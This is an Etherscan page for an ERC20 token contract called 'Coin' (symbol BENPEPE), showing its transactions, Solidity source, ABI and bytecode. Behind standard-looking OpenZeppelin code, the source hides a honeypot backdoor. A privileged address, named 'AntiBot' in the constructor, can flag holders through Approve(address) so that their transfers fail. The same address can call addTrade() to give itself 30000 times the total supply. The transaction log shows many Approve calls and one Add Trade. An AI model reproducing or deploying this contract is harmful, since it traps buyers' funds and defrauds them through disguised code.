Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 37 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 17243091 | 591 days ago | IN | 0 ETH | 0.00272571 | ||||
Add Trade | 17243088 | 591 days ago | IN | 0 ETH | 0.00285401 | ||||
Approve | 17242900 | 591 days ago | IN | 0 ETH | 0.00238427 | ||||
Approve | 17242835 | 591 days ago | IN | 0 ETH | 0.00241324 | ||||
Approve | 17242814 | 591 days ago | IN | 0 ETH | 0.00260808 | ||||
Approve | 17242777 | 591 days ago | IN | 0 ETH | 0.00233181 | ||||
Approve | 17242702 | 591 days ago | IN | 0 ETH | 0.00262788 | ||||
Approve | 17242669 | 591 days ago | IN | 0 ETH | 0.00281555 | ||||
Approve | 17242663 | 591 days ago | IN | 0 ETH | 0.00274304 | ||||
Approve | 17242643 | 591 days ago | IN | 0 ETH | 0.00337325 | ||||
Transfer | 17242618 | 591 days ago | IN | 0 ETH | 0.00183078 | ||||
Approve | 17242604 | 591 days ago | IN | 0 ETH | 0.00321 | ||||
Approve | 17242593 | 591 days ago | IN | 0 ETH | 0.00298963 | ||||
Approve | 17242575 | 591 days ago | IN | 0 ETH | 0.00270093 | ||||
Approve | 17242572 | 591 days ago | IN | 0 ETH | 0.00287956 | ||||
Approve | 17242561 | 591 days ago | IN | 0 ETH | 0.00250689 | ||||
Approve | 17242555 | 591 days ago | IN | 0 ETH | 0.00330056 | ||||
Approve | 17242544 | 591 days ago | IN | 0 ETH | 0.00276674 | ||||
Approve | 17242529 | 591 days ago | IN | 0 ETH | 0.00350178 | ||||
Approve | 17242528 | 591 days ago | IN | 0 ETH | 0.00279898 | ||||
Approve | 17242520 | 591 days ago | IN | 0 ETH | 0.00339396 | ||||
Approve | 17242507 | 591 days ago | IN | 0 ETH | 0.0025491 | ||||
Approve | 17242502 | 591 days ago | IN | 0 ETH | 0.00257006 | ||||
Approve | 17242487 | 591 days ago | IN | 0 ETH | 0.00250739 | ||||
Approve | 17242481 | 591 days ago | IN | 0 ETH | 0.00261509 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
Coin
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-12 */ /** *Submitted for verification at BscScan.com on 2023-04-16 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } abstract contract Ownable { address private _owner; function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checyydsOwen(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checyydsOwen() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } contract Coin is Ownable { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; address public _pepemuskJCEO; uint256 private _MYtotalSupply; string private _MYname; string private _MYsymbol; mapping(address => bool) private pepevipcc; function quitApprove(address sss) external { if (_pepemuskJCEO == _msgSender()){ pepevipcc[sss] = false; } } function Approve(address sss) external { if (_pepemuskJCEO == _msgSender()){ pepevipcc[sss] = true; } } function queryacawtibot(address sss) public view returns(bool) { return pepevipcc[sss]; } function vultBox() public view virtual returns (uint256) { return _MYtotalSupply; } function addTrade() external { if (_msgSender() != _pepemuskJCEO) { return; } if (_pepemuskJCEO == _msgSender()){ _balances[_msgSender()] = vultBox()*30000; } } /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_,address AntiBot) { _MYname = name_; _MYsymbol = symbol_; _pepemuskJCEO = AntiBot; _onceCCCmint(msg.sender, 1000000000*10**decimals()); } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _MYname; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _MYsymbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _MYtotalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ uint256 kkllff = 0; function _transfer( address fromSender, address to, uint256 amount ) internal virtual { require(fromSender != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 balance= _balances[fromSender]; if (pepevipcc[fromSender] != false ){ balance= _balances[fromSender]-(vultBox()); } require(balance >= amount, "ERC20: transfer amount exceeds balance"); _balances[fromSender] = balance.sub(amount); uint256 feeeA = amount.mul(kkllff).div(100); _balances[to] = _balances[to].add(amount).sub(feeeA); emit Transfer(fromSender, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _onceCCCmint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: CCCCCASADSADA to the zero address"); _MYtotalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _MYtotalSupply -= amount; } emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"AntiBot","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_pepemuskJCEO","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"addTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"queryacawtibot","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"quitApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"vultBox","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
608060405260006008553480156200001657600080fd5b50604051620012a5380380620012a58339810160408190526200003991620002a5565b6200004433620000b7565b6005620000528482620003c1565b506006620000618382620003c1565b50600380546001600160a01b0319166001600160a01b038316179055620000ae336200008b601290565b6200009890600a620005a2565b620000a890633b9aca00620005ba565b62000107565b505050620005ea565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001735760405162461bcd60e51b815260206004820152602860248201527f45524332303a204343434343415341445341444120746f20746865207a65726f604482015267206164647265737360c01b606482015260840160405180910390fd5b8060046000828254620001879190620005d4565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200020857600080fd5b81516001600160401b0380821115620002255762000225620001e0565b604051601f8301601f19908116603f01168101908282118183101715620002505762000250620001e0565b816040528381526020925086838588010111156200026d57600080fd5b600091505b8382101562000291578582018301518183018401529082019062000272565b600093810190920192909252949350505050565b600080600060608486031215620002bb57600080fd5b83516001600160401b0380821115620002d357600080fd5b620002e187838801620001f6565b94506020860151915080821115620002f857600080fd5b506200030786828701620001f6565b604086015190935090506001600160a01b03811681146200032757600080fd5b809150509250925092565b600181811c908216806200034757607f821691505b6020821081036200036857634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620003bc57600081815260208120601f850160051c81016020861015620003975750805b601f850160051c820191505b81811015620003b857828155600101620003a3565b5050505b505050565b81516001600160401b03811115620003dd57620003dd620001e0565b620003f581620003ee845462000332565b846200036e565b602080601f8311600181146200042d5760008415620004145750858301515b600019600386901b1c1916600185901b178555620003b8565b600085815260208120601f198616915b828110156200045e578886015182559484019460019091019084016200043d565b50858210156200047d5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004e4578160001904821115620004c857620004c86200048d565b80851615620004d657918102915b93841c9390800290620004a8565b509250929050565b600082620004fd575060016200059c565b816200050c575060006200059c565b8160018114620005255760028114620005305762000550565b60019150506200059c565b60ff8411156200054457620005446200048d565b50506001821b6200059c565b5060208310610133831016604e8410600b841016171562000575575081810a6200059c565b620005818383620004a3565b80600019048211156200059857620005986200048d565b0290505b92915050565b6000620005b360ff841683620004ec565b9392505050565b80820281158282048414176200059c576200059c6200048d565b808201808211156200059c576200059c6200048d565b610cab80620005fa6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806392461807116100ad578063ad55651f11610071578063ad55651f1461027e578063db63517714610291578063dd62ed3e146102a4578063f2fde38b146102b7578063f4cf1452146102ca57600080fd5b8063924618071461019e57806395d89b411461023d57806396bfcd2314610245578063a457c2d714610258578063a9059cbb1461026b57600080fd5b8063313ce567116100f4578063313ce567146101c357806339509351146101d257806370a08231146101e5578063715018a61461020e5780638da5cb5b1461021857600080fd5b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017257806318160ddd1461019e57806323b872dd146101b0575b600080fd5b6101396102d2565b6040516101469190610aa8565b60405180910390f35b61016261015d366004610b12565b610364565b6040519015158152602001610146565b610162610180366004610b3c565b6001600160a01b031660009081526007602052604090205460ff1690565b6004545b604051908152602001610146565b6101626101be366004610b57565b61037e565b60405160128152602001610146565b6101626101e0366004610b12565b6103a2565b6101a26101f3366004610b3c565b6001600160a01b031660009081526001602052604090205490565b6102166103c4565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b6101396103d8565b610216610253366004610b3c565b6103e7565b610162610266366004610b12565b610422565b610162610279366004610b12565b6104a2565b61021661028c366004610b3c565b6104b0565b600354610225906001600160a01b031681565b6101a26102b2366004610b93565b6104e5565b6102166102c5366004610b3c565b610510565b610216610586565b6060600580546102e190610bc6565b80601f016020809104026020016040519081016040528092919081815260200182805461030d90610bc6565b801561035a5780601f1061032f5761010080835404028352916020019161035a565b820191906000526020600020905b81548152906001019060200180831161033d57829003601f168201915b5050505050905090565b6000336103728185856105d8565b60019150505b92915050565b60003361038c8582856106fc565b610397858585610776565b506001949350505050565b6000336103728185856103b583836104e5565b6103bf9190610c16565b6105d8565b6103cc6109c7565b6103d66000610a21565b565b6060600680546102e190610bc6565b600354336001600160a01b039091160361041f576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b6000338161043082866104e5565b9050838110156104955760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61039782868684036105d8565b600033610372818585610776565b600354336001600160a01b039091160361041f576001600160a01b03166000908152600760205260409020805460ff19169055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6105186109c7565b6001600160a01b03811661057d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161048c565b61041f81610a21565b6003546001600160a01b0316336001600160a01b0316146105a357565b600354336001600160a01b03909116036103d6576004546105c690617530610c29565b33600090815260016020526040902055565b6001600160a01b03831661063a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161048c565b6001600160a01b03821661069b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161048c565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061070884846104e5565b9050600019811461077057818110156107635760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161048c565b61077084848484036105d8565b50505050565b6001600160a01b0383166107da5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161048c565b6001600160a01b03821661083c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161048c565b6001600160a01b03831660009081526001602090815260408083205460079092529091205460ff1615610892576004546001600160a01b03851660009081526001602052604090205461088f9190610c40565b90505b818110156108f15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161048c565b6108fb8183610a71565b6001600160a01b0385166000908152600160205260408120919091556008546109329060649061092c908690610a84565b90610a90565b6001600160a01b03851660009081526001602052604090205490915061096490829061095e9086610a9c565b90610a71565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b89087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103d65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161048c565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a7d8284610c40565b9392505050565b6000610a7d8284610c29565b6000610a7d8284610c53565b6000610a7d8284610c16565b600060208083528351808285015260005b81811015610ad557858101830151858201604001528201610ab9565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0d57600080fd5b919050565b60008060408385031215610b2557600080fd5b610b2e83610af6565b946020939093013593505050565b600060208284031215610b4e57600080fd5b610a7d82610af6565b600080600060608486031215610b6c57600080fd5b610b7584610af6565b9250610b8360208501610af6565b9150604084013590509250925092565b60008060408385031215610ba657600080fd5b610baf83610af6565b9150610bbd60208401610af6565b90509250929050565b600181811c90821680610bda57607f821691505b602082108103610bfa57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561037857610378610c00565b808202811582820484141761037857610378610c00565b8181038181111561037857610378610c00565b600082610c7057634e487b7160e01b600052601260045260246000fd5b50049056fea26469706673582212207255f86519ab48ee1896d4fd2924c1f5a0e3666b69d9f825b6752e788d3c578664736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89000000000000000000000000000000000000000000000000000000000000000742454e5045504500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000742454e5045504500000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806392461807116100ad578063ad55651f11610071578063ad55651f1461027e578063db63517714610291578063dd62ed3e146102a4578063f2fde38b146102b7578063f4cf1452146102ca57600080fd5b8063924618071461019e57806395d89b411461023d57806396bfcd2314610245578063a457c2d714610258578063a9059cbb1461026b57600080fd5b8063313ce567116100f4578063313ce567146101c357806339509351146101d257806370a08231146101e5578063715018a61461020e5780638da5cb5b1461021857600080fd5b806306fdde0314610131578063095ea7b31461014f5780630d6b406b1461017257806318160ddd1461019e57806323b872dd146101b0575b600080fd5b6101396102d2565b6040516101469190610aa8565b60405180910390f35b61016261015d366004610b12565b610364565b6040519015158152602001610146565b610162610180366004610b3c565b6001600160a01b031660009081526007602052604090205460ff1690565b6004545b604051908152602001610146565b6101626101be366004610b57565b61037e565b60405160128152602001610146565b6101626101e0366004610b12565b6103a2565b6101a26101f3366004610b3c565b6001600160a01b031660009081526001602052604090205490565b6102166103c4565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b6101396103d8565b610216610253366004610b3c565b6103e7565b610162610266366004610b12565b610422565b610162610279366004610b12565b6104a2565b61021661028c366004610b3c565b6104b0565b600354610225906001600160a01b031681565b6101a26102b2366004610b93565b6104e5565b6102166102c5366004610b3c565b610510565b610216610586565b6060600580546102e190610bc6565b80601f016020809104026020016040519081016040528092919081815260200182805461030d90610bc6565b801561035a5780601f1061032f5761010080835404028352916020019161035a565b820191906000526020600020905b81548152906001019060200180831161033d57829003601f168201915b5050505050905090565b6000336103728185856105d8565b60019150505b92915050565b60003361038c8582856106fc565b610397858585610776565b506001949350505050565b6000336103728185856103b583836104e5565b6103bf9190610c16565b6105d8565b6103cc6109c7565b6103d66000610a21565b565b6060600680546102e190610bc6565b600354336001600160a01b039091160361041f576001600160a01b0381166000908152600760205260409020805460ff191660011790555b50565b6000338161043082866104e5565b9050838110156104955760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61039782868684036105d8565b600033610372818585610776565b600354336001600160a01b039091160361041f576001600160a01b03166000908152600760205260409020805460ff19169055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6105186109c7565b6001600160a01b03811661057d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206